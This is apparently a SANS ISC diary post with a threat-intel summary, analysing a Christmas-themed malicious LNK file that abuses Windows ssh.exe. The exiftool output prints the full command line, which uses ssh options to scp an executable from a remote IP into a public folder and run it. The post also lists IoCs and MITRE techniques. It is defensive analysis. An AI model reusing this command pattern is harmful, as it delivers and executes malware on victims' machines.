Keypoints :
- The holiday season is commonly exploited by attackers to deliver malicious content.
- The file “christmas_slab.pdf.lnk” is a LNK file that executes a command using SSH.
- SSH support has been added to Windows, providing attackers with new delivery methods.
- The malicious command transfers a PE file from a remote server and executes it.
- The IP address associated with the attack belongs to Apple Inc.
MITRE Techniques :
- Command and Control (T1071): The LNK file uses SSH to connect to a remote server and execute commands.
- Execution (T1203): The LNK file executes the ssh.exe to transfer and run the malicious executable.
Indicator of Compromise :
- [file name] christmas_slab.pdf.lnk
- [ip address] 17[.]43[.]12[.]31
- [domain] apple.com
- [file name] christmas-sale.exe
- [others] ssh.exe
- Check the article for all found IoCs.
Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer but the technique used here is interesting.
For a while, Microsoft added SSH support to Windows. I remember the first time I typed “ssh” into a command line and I did not get the wonderful message:
'ssh' is not recognized as an internal or external command
Because ssh is avaiable on many computers today, Attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:
remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk ExifTool Version Number : 12.76 File Name : christmas_slab.pdf.lnk Directory : . File Size : 1992 bytes File Modification Date/Time : 2024:12:20 05:39:50-05:00 File Access Date/Time : 2024:12:20 05:39:50-05:00 File Inode Change Date/Time : 2024:12:20 05:39:50-05:00 File Permissions : -rwx------ File Type : LNK File Type Extension : lnk MIME Type : application/octet-stream Flags : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata File Attributes : Archive Create Date : 2024:10:09 05:37:10-04:00 Access Date : 2024:11:05 07:47:23-05:00 Modify Date : 2024:10:09 05:37:10-04:00 Target File Size : 1243648 Icon Index : (none) Run Window : Normal Hot Key : (none) Target File DOS Name : ssh.exe Drive Type : Fixed Disk Drive Serial Number : 280C-1822 Volume Label : Local Base Path : C:WindowsSystem32OpenSSHssh.exe Relative Path : ......WindowsSystem32OpenSSHssh.exe Working Directory : C:Program Files (x86)MicrosoftEdgeApplication Command Line Arguments : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:userspublic. && c:userspublicchristmas-sale.exe" revenge@17[.]43[.]12[.]31 Machine ID : christmas-destr
This LNK file will spawn a ssh.exe that will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retried the file.
Somethign else suspicious, the IP belows to Apple:
NetRange: 17.0.0.0 - 17.255.255.255 CIDR: 17.0.0.0/8 NetName: APPLE-WWNET NetHandle: NET-17-0-0-0-1 Parent: () NetType: Direct Allocation OriginAS: Organization: Apple Inc. (APPLEC-1-Z) RegDate: 1990-04-16 Updated: 2023-11-15 Comment: Geofeed https://ip-geolocation.apple.com Ref: https://rdap.arin.net/registry/ip/17.0.0.0
I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!
[1] https://www.virustotal.com/gui/file/8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494/details
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
Full Research: https://isc.sans.edu/diary/Christmas+Gift+Delivered+Through+SSH/31538/